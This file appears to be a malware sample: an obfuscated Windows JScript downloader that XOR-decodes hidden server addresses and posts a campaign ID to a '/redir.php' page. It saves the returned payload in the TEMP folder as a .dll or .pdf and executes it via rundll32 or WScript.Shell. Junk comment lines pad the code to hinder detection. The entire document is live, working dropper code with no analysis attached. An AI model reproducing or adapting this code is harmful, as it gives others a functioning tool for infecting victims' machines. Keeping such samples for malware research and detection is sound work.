malware/example.js

sVFmZfSR8 = "IT0601";

function sVFmZfSR5(sVFmZfSR6) {
    return new ActiveXObject(sVFmZfSR6)
//// r6JLy1ijVPK
//// 9eoOj
};

//// b81c44zCnlGhKEGFeeq
//// rMgXtx1jVd3fR2
function sVFmZfSR(rIeIICpx) {
    var sVFmZfSR4 = 's% }\x07\x05aiu<\x1do\x7f###u91t\x16\x00g\x02p<\x1f&&",$}8aMu$98H###o*"`\x18\x05p\x15q:\x14#[5:%9a###o*"`\x18\x05p\x15q:\x14#[5:%9a###X\x0e\x03F.,E3S\x01~\x0b\x18\x19\x1a\x06\x1a\x02An<###w\x276|\x10\x1dr\x0fw7~-\x271xb###s% }\x07\x05aiu<\x1do\x7f'.split("###");
//// U2gGxa
//// v5ziPM5Ffk
    if (rIeIICpx == "") {
        LsDvpMnJxWwnVn = "." + "d" + "l" + "l";
    } else {
        LsDvpMnJxWwnVn = "." + "p" + "d" + "f";
    };
    for (var imUdEbeKDequx = 0; imUdEbeKDequx < sVFmZfSR4.length; imUdEbeKDequx++) {
        var TREFONbYDJWO = sVFmZfSR5("WScript.Shell");
//// nugznF3J0MgFJS6
//// vAjJP
        EZYYP = TREFONbYDJWO.ExpandEnvironmentStrings("%TEMP%") + "\\" + Math.round(1e8 * Math.random()) + LsDvpMnJxWwnVn;
        NoPeoSwZPtbg = false;
        sVFmZfSR0 = sVFmZfSR5("MSXML2.XMLHTTP");
        sVFmZfSR0.onreadystatechange = function() {
            if (4 == sVFmZfSR0.readyState && 200 == sVFmZfSR0.status) {
                var sVFmZfSR1 = sVFmZfSR5("ADODB.Stream");
                if (sVFmZfSR1.open(), sVFmZfSR1.type = 1, sVFmZfSR1.write(sVFmZfSR0.ResponseBody), 5e3 < sVFmZfSR1.size) {
                    NoPeoSwZPtbg = true;
//// KiU13559
//// IaR517JKlqQjx2OsWqJs
                    sVFmZfSR1.position = 0;
                    sVFmZfSR1.saveToFile(EZYYP, 2);
        //            try {
                                            if (rIeIICpx == "") {
                                                        TREFONbYDJWO.Exec("rundll32 " + EZYYP + ", " + "DllRegisterServer");
                                            } else {
                                                TREFONbYDJWO.Run(EZYYP, 1, 0);
                                            };
         //           } catch (sVFmZfSR2) {

         //           };
                }
                sVFmZfSR1.close()
            }
        };
        //try {
            var LfMovFf = 'changedG6sPbuvuh4k5c';
            var goBIRMOhbeagHV = sVFmZfSR4[imUdEbeKDequx];
            for (var vBdRTlFLm = "", fEKLnpY6 = 0, fEKLnpY7 = 0; fEKLnpY6 < goBIRMOhbeagHV.length; fEKLnpY6++) vBdRTlFLm += String.fromCharCode(goBIRMOhbeagHV.charCodeAt(fEKLnpY6) ^ LfMovFf.charCodeAt(fEKLnpY7)), fEKLnpY7++, fEKLnpY7 == LfMovFf.length && (fEKLnpY7 = 0);
            sVFmZfSR7 = "http://" + vBdRTlFLm + "/redir" + "." + "p" + "h" + "p";
//// 4JogrI
//// BmWHYaTvBJw1enjn3W
            sVFmZfSR0.open("POST", sVFmZfSR7, false);
            sVFmZfSR0.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            sVFmZfSR0.send("iTlOlnxhMXnM=" + Math.random() + "&jndj=" + sVFmZfSR8 + rIeIICpx);
        //} catch (sVFmZfSR3) {

        //};

        if (NoPeoSwZPtbg) {
            break;
        };
//// 6LZ2jBFuEgyS7
//// mwbUiiO
    };
//// x3VHA4peO
//// nlGS2Sb
};

sVFmZfSR("");
sVFmZfSR("&ncm=REujpaEONlDaKr");
//// cakOzhDNWTne2k
//// f5rxqOAoRrAz9ENwnH